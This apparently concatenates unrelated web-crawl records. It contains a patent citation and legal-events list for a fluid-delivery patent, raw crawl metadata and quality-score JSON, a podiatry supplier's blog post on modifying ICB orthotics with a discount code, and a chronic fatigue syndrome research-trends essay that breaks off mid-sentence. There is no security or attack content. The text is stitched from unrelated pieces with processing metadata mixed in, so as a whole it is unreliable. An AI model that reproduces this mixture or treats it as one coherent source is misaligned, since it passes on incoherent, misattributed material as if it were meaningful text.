US5095938Dec 21, 1990Mar 17, 1992Millipore CorporationInjector for fluid delivery system
US5098741Jun 8, 1990Mar 24, 1992Lam Research CorporationMethod and system for delivering liquid reagents to processing vessels
US5195655May 24, 1991Mar 23, 1993Motorola, Inc.Integrated fluid dispense apparatus to reduce contamination
US5356034Jan 22, 1993Oct 18, 1994Boehringer Mannheim GmbhApparatus for the proportioned feeding of an analysis fluid
US5534069Jul 19, 1993Jul 9, 1996Canon Kabushiki KaishaMethod of treating active material
US5566865 *Dec 20, 1994Oct 22, 1996Valois S.A.Manual atomizing pump with adjustable dosage
US5567122 *Oct 13, 1994Oct 22, 1996Barry J. WalterCylinder pump having controllable piston/drive detachment
US5620524Feb 27, 1995Apr 15, 1997Fan; ChikoApparatus for fluid delivery in chemical vapor deposition systems
US5730804Dec 26, 1996Mar 24, 1998Tokyo Electron LimitedProcess gas supply apparatus
US5874131 *Aug 21, 1997Feb 23, 1999Micron Technology, Inc.CVD method for forming metal-containing films
US5876503Nov 27, 1996Mar 2, 1999Advanced Technology Materials, Inc.Multiple vaporizer reagent supply system for chemical vapor deposition utilizing dissimilar precursor compositions
US5906682 *Nov 4, 1997May 25, 1999Nordson CorporationFlip chip underfill system and method
US5916524 *Jul 23, 1997Jun 29, 1999Bio-Dot, Inc.Dispensing apparatus having improved dynamic range
US6116184 *Nov 17, 1997Sep 12, 2000Symetrix CorporationMethod and apparatus for misted liquid source deposition of thin film with reduced mist particle size
US6402126 *May 16, 2001Jun 11, 2002Micron Technology, Inc.Method and apparatus for vaporizing liquid precursors and system for using same
EP0529334A2Jul 29, 1992Mar 3, 1993Mks Instruments, Inc.Liquid delivery and vaporization system
GB2220869A Title not available
GB2280169A Title not available
WO1996029576A1Mar 20, 1996Sep 26, 1996Allstate Technology Pty. Ltd.Dispenser
WO1998023787A1Nov 24, 1997Jun 4, 1998Advanced Technology Materials, Inc.Multiple vaporizer reagent supply system for chemical vapor deposition utilizing dissimilar precursor compositions
Referenced by
Citing PatentFiling datePublication dateApplicantTitle
US7253084Sep 3, 2004Aug 7, 2007Asm America, Inc.Deposition from liquid sources
US7524735Jun 5, 2006Apr 28, 2009Novellus Systems, IncFlowable film dielectric gap fill process
US7582555Dec 29, 2005Sep 1, 2009Novellus Systems, Inc.CVD flowable gap fill
US7610942 *Jan 15, 2004Nov 3, 2009Amnis CorporationCell suspension rotating fluidic pump
US7629227Oct 26, 2007Dec 8, 2009Novellus Systems, Inc.CVD flowable gap fill
US7674728Mar 9, 2010Asm America, Inc.Deposition from liquid sources
US7888233Mar 25, 2009Feb 15, 2011Novellus Systems, Inc.Flowable film dielectric gap fill process
US7888273Feb 15, 2011Novellus Systems, Inc.Density gradient-free gap fill
US7915139Jul 23, 2009Mar 29, 2011Novellus Systems, Inc.CVD flowable gap fill
US7921805Apr 12, 2011Asm America, Inc.Deposition from liquid sources
US8012876Sep 6, 2011Asm International N.V.Delivery of vapor precursor from solid source
US8187951May 29, 2012Novellus Systems, Inc.CVD flowable gap fill
US8278224Oct 2, 2012Novellus Systems, Inc.Flowable oxide deposition using rapid delivery of process gases
US8309173Nov 13, 2012Asm International N.V.System for controlling the sublimation of reactants
US8343583Jul 7, 2009Jan 1, 2013Asm International N.V.Method for vaporizing non-gaseous precursor in a fluidized bed
US8481403Jan 4, 2011Jul 9, 2013Novellus Systems, Inc.Flowable film dielectric gap fill process
US8557712Dec 15, 2008Oct 15, 2013Novellus Systems, Inc.PECVD flowable dielectric gap fill
US8580697Feb 18, 2011Nov 12, 2013Novellus Systems, Inc.CVD flowable gap fill
US8685867Dec 8, 2011Apr 1, 2014Novellus Systems, Inc.Premetal dielectric integration process
US8728958Dec 9, 2010May 20, 2014Novellus Systems, Inc.Gap fill integration
US8809161Jul 3, 2013Aug 19, 2014Novellus Systems, Inc.Flowable film dielectric gap fill process
US8846536Jun 11, 2012Sep 30, 2014Novellus Systems, Inc.Flowable oxide film with tunable wet etch rate
US9064684Sep 7, 2012Jun 23, 2015Novellus Systems, Inc.Flowable oxide deposition using rapid delivery of process gases
US9245739Aug 20, 2014Jan 26, 2016Lam Research CorporationLow-K oxide deposition by hydrolysis and condensation
US9257302May 1, 2012Feb 9, 2016Novellus Systems, Inc.CVD flowable gap fill
US9299559Aug 22, 2014Mar 29, 2016Novellus Systems, Inc.Flowable oxide film with tunable wet etch rate
US20040220472 *Jan 15, 2004Nov 4, 2004Amnis CorporationCell suspension rotating fluidic pump
US20050229856 *Apr 20, 2004Oct 20, 2005Malik Roger JMeans and method for a liquid metal evaporation source with integral level sensor and external reservoir
US20050263184 *Mar 24, 2005Dec 1, 2005Choi Dae-YongSystem and method for supplying chemicals
US20060051940 *Sep 3, 2004Mar 9, 2006Todd Michael ADeposition from liquid sources
US20060109025 *Jan 11, 2006May 25, 2006Kabushiki Kaisha ToshibaTesting method for array substrate
US20060201425 *Mar 8, 2005Sep 14, 2006Applied Microstructures, Inc.Precursor preparation for controlled deposition coatings
US20070115021 *Jan 24, 2007May 24, 2007Kabushiki Kaisha ToshibaTesting method for array substrate
US20070166966 *Mar 29, 2007Jul 19, 2007Asm America, Inc.Deposition from liquid sources
US20070175392 *Jan 9, 2007Aug 2, 2007American Air Liquide, Inc.Multiple precursor dispensing apparatus
US20070194470 *Feb 19, 2007Aug 23, 2007Aviza Technology, Inc.Direct liquid injector device
US20080121306 *Jun 15, 2006May 29, 2008Markus KoegerVacuum filling of syringe liquids with outgassing compensation stroke
Classifications
U.S. Classification141/1, 118/715, 141/105, 257/E21.241, 118/726, 141/126, 141/102, 141/127, 141/198, 257/E21.279, 141/104
International ClassificationC23C16/40, F04B19/04, C23C16/56, F17D1/14, H01L21/3105, H01L21/205, H01L21/316, H01L21/00
Cooperative ClassificationH01L21/31612, C23C16/401, C23C16/56, Y02E60/34, H01L21/3105
European ClassificationC23C16/40B, C23C16/56, H01L21/3105, H01L21/316B2B
Legal Events
DateCodeEventDescription
Sep 21, 2000ASAssignment
Owner name: TRIKON HOLDINGS LIMITED, GREAT BRITAIN
Free format text: ASSIGNMENT OF ASSIGNORS INTEREST;ASSIGNOR:MACNEIL, JOHN;REEL/FRAME:011129/0425
Effective date: 20000913
Feb 9, 2007ASAssignment
Owner name: AVIZA EUROPE LIMITED, UNITED KINGDOM
Free format text: CHANGE OF NAME;ASSIGNOR:TRIKON HOLDINGS LIMITED;REEL/FRAME:018917/0079
Effective date: 20051202
May 4, 2007FPAYFee payment
Year of fee payment: 4
May 9, 2007ASAssignment
Owner name: UNITED COMMERCIAL BANK, CALIFORNIA
Free format text: INTELLECTUAL PROPERTY SECURITY AGREEMENT;ASSIGNORS:AVIZA TECHNOLOGY, INC.;AVIZA, INC.;REEL/FRAME:019265/0381
Effective date: 20070413
Feb 27, 2009ASAssignment
Owner name: AVIZA, INC., CALIFORNIA
Free format text: UCC FINANCING STATEMENT AMENDMENT-COLLATERAL CHANGE, DELETING CERTAIN COLLATERAL FROM THE FINANCINGSTATEMENT;ASSIGNOR:UNITED COMMERCIAL BANK, 5201 GREAT AMERICAN PARKWAY #300, SANTA CLARA, CA 95054-1140;REEL/FRAME:022320/0401
Effective date: 20090114
Owner name: AVIZA TECHNOLOGY, INC., CALIFORNIA
Free format text: UCC FINANCING STATEMENT AMENDMENT-COLLATERAL CHANGE, DELETING CERTAIN COLLATERAL FROM THE FINANCINGSTATEMENT;ASSIGNOR:UNITED COMMERCIAL BANK, 5201 GREAT AMERICAN PARKWAY #300, SANTA CLARA, CA 95054-1140;REEL/FRAME:022320/0401
Effective date: 20090114
Mar 3, 2009ASAssignment
Owner name: AVIZA TECHNOLOGY, INC., CALIFORNIA
Free format text: RELEASE OF SECURITY INTEREST IN PATENTS;ASSIGNOR:UNITED COMMERCIAL BANK, 5201 GREAT AMERICAN PARKWAY #300, SANTA CLARA, CA 95054-1140;REEL/FRAME:022331/0470
Effective date: 20090302
Owner name: AVIZA, INC., CALIFORNIA
Free format text: RELEASE OF SECURITY INTEREST IN PATENTS;ASSIGNOR:UNITED COMMERCIAL BANK, 5201 GREAT AMERICAN PARKWAY #300, SANTA CLARA, CA 95054-1140;REEL/FRAME:022331/0484
Effective date: 20090302
Mar 31, 2009ASAssignment
Owner name: TOKYO ELECTRON LIMITED, JAPAN
Free format text: ASSIGNMENT OF ASSIGNORS INTEREST;ASSIGNORS:AVIZA TECHNOLOGY, INC.;AVIZA, INC.;REEL/FRAME:022473/0020
Effective date: 20090316
Apr 7, 2011FPAYFee payment
Year of fee payment: 8
Jun 12, 2015REMIMaintenance fee reminder mailed
Nov 4, 2015LAPSLapse for failure to pay maintenance fees
Dec 22, 2015FPExpired due to failure to pay maintenance fee
Effective date: 20151104
|
{
"url": "http://www.google.com/patents/US6640840?dq=7,134,016",
"source_domain": "www.google.com",
"snapshot_id": "crawl=CC-MAIN-2016-40",
"warc_metadata": {
"Content-Length": "86966",
"Content-Type": "application/http; msgtype=response",
"WARC-Block-Digest": "sha1:6MZAGV6IVMP34X7J4BMVNHMBNRTD2GF2",
"WARC-Concurrent-To": "<urn:uuid:8321443d-2a7a-4771-b3e5-f7358761f868>",
"WARC-Date": "2016-09-26T01:23:09Z",
"WARC-IP-Address": "209.85.144.103",
"WARC-Identified-Payload-Type": null,
"WARC-Payload-Digest": "sha1:2QHVEC4WF6QBUMKYPPTSUVCKJKHPWOZO",
"WARC-Record-ID": "<urn:uuid:73d03bda-08dc-4d40-9986-d0827045fede>",
"WARC-Target-URI": "http://www.google.com/patents/US6640840?dq=7,134,016",
"WARC-Truncated": null,
"WARC-Type": "response",
"WARC-Warcinfo-ID": "<urn:uuid:6dc099f9-215b-4dd9-91a2-4eaafd176a7e>"
},
"warc_info": "robots: classic\r\nhostname: ip-10-143-35-109.ec2.internal\r\nsoftware: Nutch 1.6 (CC)/CC WarcExport 1.0\r\nisPartOf: CC-MAIN-2016-40\r\noperator: CommonCrawl Admin\r\ndescription: Wide crawl of the web for September 2016\r\npublisher: CommonCrawl\r\nformat: WARC File Format 1.0\r\nconformsTo: http://bibnum.bnf.fr/WARC/WARC_ISO_28500_version1_latestdraft.pdf"
}
|
{
"line_start_idx": [
0,
56,
64,
205,
206,
214,
215,
243,
274,
296,
328,
356,
380,
406,
423,
468,
574,
596,
637,
676,
727,
794,
808,
817,
1412,
1422,
1436,
1446,
1456,
1476,
1554,
1629,
1664,
2053,
2116,
2197,
2692,
3057,
3459,
3537,
3612,
3647,
4036,
4099,
4180,
4675,
5040,
5459,
5537,
5612,
5647,
5806,
5957,
6090,
6529,
6637,
6765,
6921,
7147,
7232,
7566,
8093,
8484,
8496,
8497,
8616,
8617,
9305,
9306,
9388,
9389,
9430,
9431,
9549,
9550,
10462,
10463,
11146,
11147,
11906,
11907,
12176,
12177,
12429,
12430,
12983,
12984,
13595,
13596,
13643,
13644,
13887,
13888,
14014,
14015,
14152,
14153,
14295,
14296,
14435,
14436,
14540,
14541,
14783,
14784,
14954,
14955,
15122,
15123,
15189,
15190,
15250,
15251,
15373,
15374,
15802,
15803,
16048,
16049,
16966,
16967,
17360,
17361,
17768,
17769,
18465,
18466,
18771,
18772,
18919,
18920,
19200,
19201,
19344,
19345,
19588,
19589,
19628,
19629,
19775,
19776,
19890,
19891,
19939,
19940,
20007,
20008,
20092,
20093,
20572,
20573,
21009,
21010,
21027,
21081,
21179,
21297,
21386,
21513,
21620,
21737,
21826,
21917,
22025,
22134,
22218,
22322,
22504,
22595,
22694,
22851,
22989,
23084,
23115,
23146,
23223,
23410,
23424,
23479,
23558,
23653,
23729,
23818,
23894,
23962,
24059,
24133,
24210,
24279,
24367,
24432,
24538,
24633,
24749,
24844,
24934,
25011,
25104,
25179,
25275,
25377,
25495,
25606,
25681,
25783,
25876,
26033,
26126,
26208,
26306,
26430,
26528,
26615,
26718,
26809,
26931,
26947,
27070,
27188,
27274,
27347,
27360,
27385,
27410,
27461,
27558,
27583,
27607,
27656,
27745,
27770,
27797,
27820,
27844,
27891,
28018,
28043,
28068,
28104,
28348,
28373,
28420,
28664,
28689,
28713,
28760,
28935,
28960,
28996,
29171,
29196,
29221,
29263,
29382,
29407,
29434,
29457,
29505,
29562,
29622
],
"line_end_idx": [
56,
64,
205,
206,
214,
215,
243,
274,
296,
328,
356,
380,
406,
423,
468,
574,
596,
637,
676,
727,
794,
808,
817,
1412,
1422,
1436,
1446,
1456,
1476,
1554,
1629,
1664,
2053,
2116,
2197,
2692,
3057,
3459,
3537,
3612,
3647,
4036,
4099,
4180,
4675,
5040,
5459,
5537,
5612,
5647,
5806,
5957,
6090,
6529,
6637,
6765,
6921,
7147,
7232,
7566,
8093,
8484,
8496,
8497,
8616,
8617,
9305,
9306,
9388,
9389,
9430,
9431,
9549,
9550,
10462,
10463,
11146,
11147,
11906,
11907,
12176,
12177,
12429,
12430,
12983,
12984,
13595,
13596,
13643,
13644,
13887,
13888,
14014,
14015,
14152,
14153,
14295,
14296,
14435,
14436,
14540,
14541,
14783,
14784,
14954,
14955,
15122,
15123,
15189,
15190,
15250,
15251,
15373,
15374,
15802,
15803,
16048,
16049,
16966,
16967,
17360,
17361,
17768,
17769,
18465,
18466,
18771,
18772,
18919,
18920,
19200,
19201,
19344,
19345,
19588,
19589,
19628,
19629,
19775,
19776,
19890,
19891,
19939,
19940,
20007,
20008,
20092,
20093,
20572,
20573,
21009,
21010,
21027,
21081,
21179,
21297,
21386,
21513,
21620,
21737,
21826,
21917,
22025,
22134,
22218,
22322,
22504,
22595,
22694,
22851,
22989,
23084,
23115,
23146,
23223,
23410,
23424,
23479,
23558,
23653,
23729,
23818,
23894,
23962,
24059,
24133,
24210,
24279,
24367,
24432,
24538,
24633,
24749,
24844,
24934,
25011,
25104,
25179,
25275,
25377,
25495,
25606,
25681,
25783,
25876,
26033,
26126,
26208,
26306,
26430,
26528,
26615,
26718,
26809,
26931,
26947,
27070,
27188,
27274,
27347,
27360,
27385,
27410,
27461,
27558,
27583,
27607,
27656,
27745,
27770,
27797,
27820,
27844,
27891,
28018,
28043,
28068,
28104,
28348,
28373,
28420,
28664,
28689,
28713,
28760,
28935,
28960,
28996,
29171,
29196,
29221,
29263,
29382,
29407,
29434,
29457,
29505,
29562,
29622,
29646
]
}
|
{
"red_pajama_v2": {
"ccnet_original_length": 29646,
"ccnet_original_nlines": 259,
"rps_doc_curly_bracket": 0,
"rps_doc_ldnoobw_words": 0,
"rps_doc_lorem_ipsum": 0,
"rps_doc_stop_word_fraction": 0.3155060410499573,
"rps_doc_ut1_blacklist": 0,
"rps_doc_frac_all_caps_words": 0.04753946140408516,
"rps_doc_frac_lines_end_with_ellipsis": 0,
"rps_doc_frac_no_alph_words": 0.2003713995218277,
"rps_doc_frac_unique_words": 0.24854974448680878,
"rps_doc_mean_word_length": 5.436858654022217,
"rps_doc_num_sentences": 185,
"rps_doc_symbol_to_word_ratio": 0.0007428000099025667,
"rps_doc_unigram_entropy": 5.797293186187744,
"rps_doc_word_count": 4482,
"rps_doc_frac_chars_dupe_10grams": 0.22628037631511688,
"rps_doc_frac_chars_dupe_5grams": 0.3565331697463989,
"rps_doc_frac_chars_dupe_6grams": 0.31303349137306213,
"rps_doc_frac_chars_dupe_7grams": 0.2738017141819,
"rps_doc_frac_chars_dupe_8grams": 0.2529546916484833,
"rps_doc_frac_chars_dupe_9grams": 0.24207977950572968,
"rps_doc_frac_chars_top_2gram": 0.010874919593334198,
"rps_doc_frac_chars_top_3gram": 0.014034800231456757,
"rps_doc_frac_chars_top_4gram": 0.010833879932761192,
"rps_doc_books_importance": -2053.2978515625,
"rps_doc_books_importance_length_correction": -2053.2978515625,
"rps_doc_openwebtext_importance": -1410.73046875,
"rps_doc_openwebtext_importance_length_correction": -1410.73046875,
"rps_doc_wikipedia_importance": -685.5918579101562,
"rps_doc_wikipedia_importance_length_correction": -685.5918579101562
},
"fasttext": {
"dclm": 0.031386490911245346,
"english": 0.8757786750793457,
"fineweb_edu_approx": 2.027724504470825,
"eai_general_math": 0.039634820073843,
"eai_open_web_math": 0.1398639678955078,
"eai_web_code": 0.0002759099879767746
}
}
|
{
"free_decimal_correspondence": {
"primary": {
"code": "620.118",
"labels": {
"level_1": "Industrial arts, Technology, and Engineering",
"level_2": "Engineering",
"level_3": ""
}
},
"secondary": {
"code": "621.40285",
"labels": {
"level_1": "Industrial arts, Technology, and Engineering",
"level_2": "Engineering",
"level_3": "Mechanical engineering and Machinery"
}
}
},
"bloom_cognitive_process": {
"primary": {
"code": "3",
"label": "Apply"
},
"secondary": {
"code": "2",
"label": "Understand"
}
},
"bloom_knowledge_domain": {
"primary": {
"code": "3",
"label": "Procedural"
},
"secondary": {
"code": "2",
"label": "Conceptual"
}
},
"document_type_v1": {
"primary": {
"code": "11",
"label": "Legal/Regulatory"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"extraction_artifacts": {
"primary": {
"code": "3",
"label": "Irrelevant Content"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"missing_content": {
"primary": {
"code": "4",
"label": "Missing Images or Figures"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"document_type_v2": {
"primary": {
"code": "8",
"label": "Documentation"
},
"secondary": {
"code": "10",
"label": "Knowledge Article"
}
},
"reasoning_depth": {
"primary": {
"code": "3",
"label": "Intermediate Reasoning"
},
"secondary": {
"code": "4",
"label": "Advanced Reasoning"
}
},
"technical_correctness": {
"primary": {
"code": "4",
"label": "Highly Correct"
},
"secondary": {
"code": "3",
"label": "Mostly Correct"
}
},
"education_level": {
"primary": {
"code": "4",
"label": "Graduate/Expert Level"
},
"secondary": {
"code": "3",
"label": "Undergraduate Level"
}
}
}
|
71f077df794da2774531b20248bb19b0
|
5,782,636,591,712,299,000
|
Modifying orthotics
ICB Lower limb biomechanics
One issue that often surfaces when using orthotic products is, whether there is a need to heat mould and apply additions or grind and modify the orthotics?
SAVE 10% OFF ICB PRODUCTS WITH DISCOUNT CODE: 02ICB10 Offer online only!
The question of heat moulding often arises and the answer is simply, it may not be necessary in every situation. However, heat moulding does assist in avoiding patient compliance issues.
Using additions to improve the treatment of the basic orthotic foot bed, is one, in which many practitioners are not that familiar with in the modification process.
Most additions are used to treat specific conditions by providing the support which has been lost, such as: metatarsal domes to support the transverse arch or a heel lift to support a short leg.
Many orthotic manufacturers promote their products as being one which can be taken from the display pack and placed in the shoe with no further alteration needed. This may be so for some patients, however, simple adjustments may provide the necessary comfort and treatment result the patient requires.
A key element to achieving a satisfactory treatment commences with checking that the ‘off the shelf’ orthotic contains at least a basic rearfoot varus angle to enable correct alignment for the patient.
Products available in pharmacies often only provide arch support without attending to rearfoot (calcaneal) control.
Practitioners should check the rearfoot position by simply viewing and where necessary measuring, using a biomechanical protractor.
Measuring, using a biomechanical protractor.
ICB heat mouldable orthotics exhibit a 50 rearfoot varus post to align the calcaneus with the average tibial varum angle, thus placing the foot into the patients ideal position.
ICB heat mouldable orthotics
View ICB Products
Reducing excess pronation can have substantial benefits, such as reducing internal tibial rotation.
ICB Orthotics Reducing Pronation
The product that a practitioner chooses to use, should be one which is easy to modify and alter, thus providing the necessary treatment requirements. For example, ability to incorporate an intrinsic dome into the orthotic device, thus providing the patient with a product with increased functionality or provide more comfort to the wearer.
Orthotic Heat Moulded
Use a heat gun to mould the dome into the plantar surface. (see other videos on Youtube)
Simple add on additions, such as, medial flanges can reduce medial rubbing of the foot on the shoe or provide increased support for patients such as CP suffers and excessive pronators can be quite useful.
ICB orthotic medial flange
For practitioners who want to modify the actual orthotic by grinding , there are many simple adjustments that can be made, such as a deflection for a plantarflexed 1st . (see below)
Orthotic modified by grinding
Pictured below is a 1st metatarsal deflection for a 2/3 or 3/4 length orthotic.
1st metatarsal deflection for a three quarter length orthotic
The ability to adjust and modify the product within the clinic can be a great asset. The product should have the ability to be modified by either application of heat (using a heat gun) and also be a material that can be ground and shaped using either bench grinders or hand grinders.
Modifying an Orthotic
(above) Deflection for dropped metatarsal heads using heat and a spoon to create a depression .
For those practitioners with higher hand skills the grinding option is fast and extremely effective.
One very useful modification is the use of a full length ICB orthotic product to fashion a Morton’s ramp in which toe separator is an incorporated feature.
The steps to creating this modification are as follows:
Step 1
Mark the distal position of the ramp, 5mm distal to the hallux.
Modifying Orthotics
Step 2
Mark out the Morton’s ramp ensuring that it sits between the hallux and the 2nd phalange.
Mortons Ramp
Step 3
Add the toe separator shape and cut to shape.
Toe Separator
Step 4
Use the heat gun and the grinder to position the toe separator and smooth down the edges.
ICB Heat Gun
ICB Heat Moulded Orthotic
View ICB Products
Leave a Reply
Your email address will not be published. Required fields are marked *
|
{
"url": "https://blog.dltpodiatry.co.uk/modifying-orthotics/",
"source_domain": "blog.dltpodiatry.co.uk",
"snapshot_id": "CC-MAIN-2024-38",
"warc_metadata": {
"Content-Length": "45964",
"Content-Type": "application/http; msgtype=response",
"WARC-Block-Digest": "sha1:RWLJ57WQYGLUK5A4S5MXAYLXSK7LQZFT",
"WARC-Concurrent-To": "<urn:uuid:d28aea18-e0ab-42b0-a56c-c0fa68bd3836>",
"WARC-Date": "2024-09-14T18:21:52Z",
"WARC-IP-Address": "20.68.47.254",
"WARC-Identified-Payload-Type": "text/html",
"WARC-Payload-Digest": "sha1:JCXLEIFIUOXOEQTOQC2XD2FSFOMWWRSH",
"WARC-Record-ID": "<urn:uuid:2b70384b-1f5d-4a08-be12-dfc8b9a9aded>",
"WARC-Target-URI": "https://blog.dltpodiatry.co.uk/modifying-orthotics/",
"WARC-Truncated": null,
"WARC-Type": "response",
"WARC-Warcinfo-ID": "<urn:uuid:90f3cecf-4490-40f3-9f51-3282e762f7db>"
},
"warc_info": "isPartOf: CC-MAIN-2024-38\r\npublisher: Common Crawl\r\ndescription: Wide crawl of the web for September 2024\r\noperator: Common Crawl Admin ([email protected])\r\nhostname: ip-10-67-67-49\r\nsoftware: Apache Nutch 1.20 (modified, https://github.com/commoncrawl/nutch/)\r\nrobots: checked via crawler-commons 1.5-SNAPSHOT (https://github.com/crawler-commons/crawler-commons)\r\nformat: WARC File Format 1.1\r\nconformsTo: https://iipc.github.io/warc-specifications/specifications/warc-format/warc-1.1/"
}
|
{
"line_start_idx": [
0,
20,
21,
49,
50,
206,
207,
280,
281,
468,
469,
634,
635,
830,
831,
1133,
1134,
1336,
1337,
1453,
1454,
1586,
1631,
1632,
1810,
1811,
1840,
1841,
1859,
1860,
1960,
1961,
1994,
1995,
2335,
2336,
2358,
2359,
2448,
2449,
2654,
2655,
2682,
2683,
2865,
2866,
2896,
2897,
2977,
3039,
3040,
3324,
3325,
3347,
3348,
3444,
3445,
3546,
3547,
3703,
3704,
3760,
3761,
3768,
3832,
3833,
3853,
3854,
3861,
3862,
3952,
3953,
3966,
3967,
3974,
3975,
4021,
4022,
4036,
4037,
4044,
4045,
4135,
4148,
4149,
4175,
4176,
4194,
4195,
4209,
4210
],
"line_end_idx": [
20,
21,
49,
50,
206,
207,
280,
281,
468,
469,
634,
635,
830,
831,
1133,
1134,
1336,
1337,
1453,
1454,
1586,
1631,
1632,
1810,
1811,
1840,
1841,
1859,
1860,
1960,
1961,
1994,
1995,
2335,
2336,
2358,
2359,
2448,
2449,
2654,
2655,
2682,
2683,
2865,
2866,
2896,
2897,
2977,
3039,
3040,
3324,
3325,
3347,
3348,
3444,
3445,
3546,
3547,
3703,
3704,
3760,
3761,
3768,
3832,
3833,
3853,
3854,
3861,
3862,
3952,
3953,
3966,
3967,
3974,
3975,
4021,
4022,
4036,
4037,
4044,
4045,
4135,
4148,
4149,
4175,
4176,
4194,
4195,
4209,
4210,
4280
]
}
|
{
"red_pajama_v2": {
"ccnet_original_length": 4280,
"ccnet_original_nlines": 90,
"rps_doc_curly_bracket": 0,
"rps_doc_ldnoobw_words": 0,
"rps_doc_lorem_ipsum": 0,
"rps_doc_stop_word_fraction": 0.39790576696395874,
"rps_doc_ut1_blacklist": 0,
"rps_doc_frac_all_caps_words": 0.026178009808063507,
"rps_doc_frac_lines_end_with_ellipsis": 0,
"rps_doc_frac_no_alph_words": 0.1073298379778862,
"rps_doc_frac_unique_words": 0.4345930218696594,
"rps_doc_mean_word_length": 5.055232524871826,
"rps_doc_num_sentences": 31,
"rps_doc_symbol_to_word_ratio": 0,
"rps_doc_unigram_entropy": 5.140011310577393,
"rps_doc_word_count": 688,
"rps_doc_frac_chars_dupe_10grams": 0,
"rps_doc_frac_chars_dupe_5grams": 0.03737780079245567,
"rps_doc_frac_chars_dupe_6grams": 0,
"rps_doc_frac_chars_dupe_7grams": 0,
"rps_doc_frac_chars_dupe_8grams": 0,
"rps_doc_frac_chars_dupe_9grams": 0,
"rps_doc_frac_chars_top_2gram": 0.008625649847090244,
"rps_doc_frac_chars_top_3gram": 0.012075910344719887,
"rps_doc_frac_chars_top_4gram": 0.016101209446787834,
"rps_doc_books_importance": -436.71221923828125,
"rps_doc_books_importance_length_correction": -436.71221923828125,
"rps_doc_openwebtext_importance": -243.64857482910156,
"rps_doc_openwebtext_importance_length_correction": -243.64857482910156,
"rps_doc_wikipedia_importance": -164.67691040039062,
"rps_doc_wikipedia_importance_length_correction": -164.67691040039062
},
"fasttext": {
"dclm": 0.05210477113723755,
"english": 0.9065835475921631,
"fineweb_edu_approx": 2.1771254539489746,
"eai_general_math": 0.07437294721603394,
"eai_open_web_math": 0.4660543203353882,
"eai_web_code": 0.0035701999440789223
}
}
|
{
"free_decimal_correspondence": {
"primary": {
"code": "617.892",
"labels": {
"level_1": "Industrial arts, Technology, and Engineering",
"level_2": "Medicine",
"level_3": "Surgery and Dentistry"
}
},
"secondary": {
"code": "617.89",
"labels": {
"level_1": "Industrial arts, Technology, and Engineering",
"level_2": "Medicine",
"level_3": "Surgery and Dentistry"
}
}
},
"bloom_cognitive_process": {
"primary": {
"code": "3",
"label": "Apply"
},
"secondary": {
"code": "2",
"label": "Understand"
}
},
"bloom_knowledge_domain": {
"primary": {
"code": "3",
"label": "Procedural"
},
"secondary": {
"code": "2",
"label": "Conceptual"
}
},
"document_type_v1": {
"primary": {
"code": "3",
"label": "Reference/Encyclopedic/Educational"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"extraction_artifacts": {
"primary": {
"code": "3",
"label": "Irrelevant Content"
},
"secondary": {
"code": "0",
"label": "No Artifacts"
}
},
"missing_content": {
"primary": {
"code": "4",
"label": "Missing Images or Figures"
},
"secondary": {
"code": "0",
"label": "No missing content"
}
},
"document_type_v2": {
"primary": {
"code": "23",
"label": "Tutorial"
},
"secondary": {
"code": "10",
"label": "Knowledge Article"
}
},
"reasoning_depth": {
"primary": {
"code": "3",
"label": "Intermediate Reasoning"
},
"secondary": {
"code": "2",
"label": "Basic Reasoning"
}
},
"technical_correctness": {
"primary": {
"code": "3",
"label": "Mostly Correct"
},
"secondary": {
"code": "4",
"label": "Highly Correct"
}
},
"education_level": {
"primary": {
"code": "3",
"label": "Undergraduate Level"
},
"secondary": {
"code": "2",
"label": "High School Level"
}
}
}
|
71f077df794da2774531b20248bb19b0
|
6,685,860,692,088,179,000
|
≡ Menu
Trends in Chronic Fatigue Syndrome Research
This paper examines the quantity and focus of CFS research over time and draws some conclusions regarding their implications for CFS patients.
Background
After CFS burst upon the scene in the mid eighties it didn’t take it long to become a major research topic. The first study PubMed cites on CFS (in the 1980’s) was published in 1987* and by 1988/9 the field was up and running. Since 1991 papers with CFS or its equivalent in the title have never numbered less than 100 a year.
Similarly the number of citations PubMed cites for ‘Chronic fatigue syndrome’ are astounding; a search on 2/22/05 brought up 2949 citations with some connection to CFS. These numbers appear at first blush to demonstrate an impressive commitment by the medical establishment to the resolution of CFS.
Progress in our understanding of CFS, however, has been slow. The cause of the disease is still obscure and treatments are still largely ineffective. Instead of addressing the core dysfunctions found in CFS, physicians are often relegated to treat it symptomatically.
There is still no accepted biomarker for this disease and, of course, we still have its unfortunate name. While few in the medical field, at least, appear to believe it has a psychological origin, the role psychology plays in the course of the disease has raised quite controversial. Few findings in this disease, in fact, are without controversy.
The survey was prompted by the discordance between all this activity and the lack of progress in the disease. How could we – 18 years after the ‘advent’ of CFS and some 3000 PubMed citations later – still be saddled with this unfortunate name? Why is there still no test for CFS or an acceptable definition of it?
It is true that CFS is a very complex disease that is difficult to analyze given its changing definitions and the different subsets of patients found within it. But is it THAT mysterious? THAT impervious to investigation? THAT much of an enigma? Or have other factors contributed to the slow pace of knowledge? This question prompted a survey of how the quantity, focus and ‘potential’ of CFS research has changed over time.
The survey
The papers included in this survey were those cited when ‘chronic fatigue syndrome’ was entered into the search bar at PubMed. PubMed is a search engine sponsored by the National Library of Medicine that accesses over 15 million citations of biomedical papers dating back to the 1950’s (but not the Journal of Chronic Fatigue Syndrome (JCFS)).
A list of titles and abstracts for the JCFS dating back to 1998 on the Haworth Press website were used) Only those articles (with a very few exceptions) with chronic fatigue syndrome or myalgic encephalitis in the title were included. (Prior to 1992 when the term CFS was essentially codified citations with pseudonyms for CFS such as postviral fatigue syndrome, EBV syndrome, etc. were included.)
Based either on the title or the abstract provided by PubMed or the Haworth web site the papers were grouped into the following broad categories based on my assessment of their primary orientation; clinical, immune, psychological, brain/CNS. endocrine, metabolic, cardiac, oxidative, cognitive – neuropsychological, sleep, muscles, tilt table, others. A few papers had more than one focus.
The survey examined PubMed citations from 1988/9, 1991, 1994, 1997, 2000, 2003 and 2004 and JCFS papers from 2000, 2003 and 2004.
Quantity
The most surprising finding was that except for very recently over the past 13 years the quantity of PubMed citations has remained more or less stable. One would have thought that as the field matured and became better known the number of citations would increase. Except perhaps for the last year or so this has not occurred. (The number of articles in the table below appears to pick up a bit after 1997.
